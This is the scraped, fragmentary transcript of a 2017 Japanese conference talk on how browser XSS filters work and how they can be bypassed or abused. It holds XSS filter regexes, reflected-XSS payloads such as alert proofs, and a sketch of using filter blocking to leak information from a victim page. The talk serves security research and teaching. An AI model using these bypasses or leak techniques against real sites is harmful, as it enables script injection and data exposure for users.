$30 off During Our Annual Pro Sale. View Details »

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Masato Kinugawa

March 31, 2017
Tweet

More Decks by Masato Kinugawa

Other Decks in Technology

Transcript

  1. View Slide

  2. View Slide





  3. View Slide

  4. View Slide

  5. https://example.com/?q=">


    ">



    View Slide

  6. https://example.com/?q=">


    ">



    View Slide

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

    View Slide

  8. HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  9. View Slide

  10. View Slide

  11. View Slide

  12. https://example.com/?q=">
    https://example.com/#5382863726995448701


    ">
    ">

    View Slide

  13. View Slide

  14. ">


    https://example.com/?q=">

    View Slide

  15. ">


    https://example.com/?q=">

    View Slide

  16. https://example.com/?q=">
    https://example.com/#5382863726995448701


    View Slide

  17. <script> - Google 検索
    (function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>

    View Slide


  18. <br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>
    https://example.com/?

    View Slide

  19. View Slide

  20. {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
    *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
    |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
    );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
    (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
    A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
    b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    ">

    View Slide

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">

    View Slide

  22. ">
    [\"\'][ ]*(([^a-z0-
    9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
    )).+?{\(}.*?{\)}
    x="";alert(1)//"

    View Slide

  23. View Slide

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
    2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

    View Slide

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

    View Slide

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/>q = "";document#body.innerHTML="<xss>";<br/>
    URL: ?q=";document.body.innerHTML="

    View Slide

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>
    URL: ?"/++.+++=

    View Slide

  28. "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:

    View Slide

  29. type="text/javascript">

    View Slide

  30. window#name//Syntax Error
    window^name//Syntax OK
    window.name<br/>

    View Slide

  31. View Slide

  32. url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }

    View Slide

  33. https://example.com/?q=";alert`1`//

    <br/>q = "";alert`1`//";<br/>
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else

    View Slide

  34. https://example.com/?q=${alert(1)}``//&`+++`

    https://example.com/?q=[USER_INPUT]

    <br/>foo=``;<br/>q="[USER_INPUT]";<br/>
    <br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>

    View Slide

  35. https://example.com/?+onfiles+++=.

    type="text/javascript">

    [...]

    View Slide

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

    View Slide

  37. View Slide

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

    View Slide

  39. https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win=window.open(…) if(win.length == 0){
    //
    //
    }else{
    //
    }

    View Slide






  40. View Slide

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

    View Slide

  42. HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  43. https://accounts.google.com/ServiceLogin?

    View Slide

  44. google.ae
    google.as
    google.ca
    google.co
    google.co.in
    google.co.jp
    google.co.kr
    google.co.nz
    google.co.uk
    google.com.br
    google.com.mx
    google.de
    google.es
    google.fr
    google.it
    google.pl
    google.pt
    google.ru
    ...(

    View Slide




  45. View Slide

  46. {

    View Slide

  47. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/

    View Slide

  48. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  49. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  50. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  51. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  52. [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

    View Slide





  53. View Slide

  54. View Slide

  55. https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=

    View Slide

  56. https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=

    View Slide

  57. https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...

    View Slide




  58. View Slide

  59. View Slide

  60. View Slide

  61. View Slide

  62. View Slide




  63. View Slide






  64. View Slide







  65. View Slide

  66. View Slide